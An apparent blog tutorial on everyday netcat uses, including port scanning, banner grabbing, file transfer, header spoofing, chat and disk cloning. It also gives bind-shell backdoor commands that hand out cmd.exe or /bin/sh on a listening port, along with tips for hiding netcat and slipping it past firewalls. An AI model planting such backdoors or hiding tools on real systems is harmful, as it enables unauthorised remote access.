Netcat (The Swiss Army Knife): useful commands.

      No Comments on Netcat (The Swiss Army Knife): useful commands.

In this tutorual will go over the most useful netcat commands. Netcat is a tool that every IT professional should have in their tool box, if you’re responsible for network or systems security, it is essential that you understand the capabilities of netcat. The original version of netcat is a UNIX program. Its author is known as Hobbit. He released version 1.1 in March of 1996. Netcat is available for Unix and Windows OS.
Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities, including: port scanner, backdoor, port redirector, port listener, and lots of other things….Let’s see what we can do with netcat.

Tips for using netcat in windows:

Here are some tips for hiding netcat on a system or using it behind a firewall.

* Rename the executable or compile the application yourself
* Detach from the console using the -d option
* Use a port that is well known and allowed through firewalls

Port scanner: netcat doesn’t have the features that nmap offers, but if you want to see what ports are open it will do the job. The command bellow will scan the target computer from port 1 to 150

nc -v -w 2 -z 192.168.10.10 1-150

Banner Grabbing: if you’re interested what Operating Systems is running behind port 80(http) or 21(ftp), you can use netcat to grab banner.

nc -v -n 192.168.10.10 80

(UNKNOWN) [192.168.10.10] 80 (?) open

GET HTTP

HTTP/1.1 400 Bad Request

Server: Microsoft-IIS/5.0

Date: Sat, 07 June 2008 20:50:04 GMT

Content-Type: text/html

Content-Length: 87

ErrorThe parameter

Backdoor: if you want to use it as a backdoor to get a remote command or shell…

nc -L -p 1001 -d -e cmd.exe

The -L option tells netcat not to close and wait for connections, the -p specifies the port netcat listens on, the -d is telling netcat to detach from the process we want it to run, and -e tells what program to run once the connection is made, in this case the cmd.exe(command promp)

and in Unix/Linux systems…

nc -l -p 1001 -e /bin/sh

to connect to 192.168.10.10, issue this command

nc 192.168.10.10 1001

File Transfer: Let’s say that you want to transfer a file from one machine to another

on the receiving host 192.168.10.10

nc -l -p 1001 > file.txt

on the sending machine

nc 192.168.10.10 < file.txt

Spoofing HTTP Headers: You can use netcat to connect to a server using completely spoofed headers. You can actually type out your user agent, referrer and etc. It’s useful when you want to generate bunch of hits that can be easily found in the logs or something like that:

C:\>nc ubuntu-box 80
GET / HTTP/1.1
Host: myhost.com
User-Agent: not-your-business
Referrer: not-your-business

Note that your request won’t be sent until you generate a blank line. So hit return twice when your are done typing. You will get a response of headers and HTML streaming down your screen

HTTP/1.1 200 OK
Date: Sun, 08 Jun 2008 01:04:02 GMT
Server: Apache/2.2.8 (Ubuntu)
Last-Modified: Wed, 07 May 2008 19:33:34 GMT
ETag: “d3a11-2d-44ca90a5e9f80”
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html

Chat Server: if you need to start a chat application quick and easy without the need for installing msn or yahoo IM…

start listening for connection on the client machine 192.168.10.10

nc -l -p 1001

on the remote machine, use the following command and start typing when you press enter the message will display on the remote machine.

nc 192.168.10.10 1001

Hard Drive Cloning Over the Network: to clone the entire hard drive or just a partition, the partition needs to be unmounted so it is a good practice to boot the system from a live cd and then create the image.

on the receiving machine..

nc -l -p 1001 | dd of=/dev/sda

on the system you want to clone do.

dd if=/dev/sda | nc 192.168.10.10 1001

conclusion: Netcat is a tool that every IT professional should be familiar with, it is a good tool to test the security of your network, like testing your firewall/routers and Operating Systems. It should be use with caution and I don’t suggest installing it in a production enviroment.

Share This!

Leave a Reply

Your email address will not be published.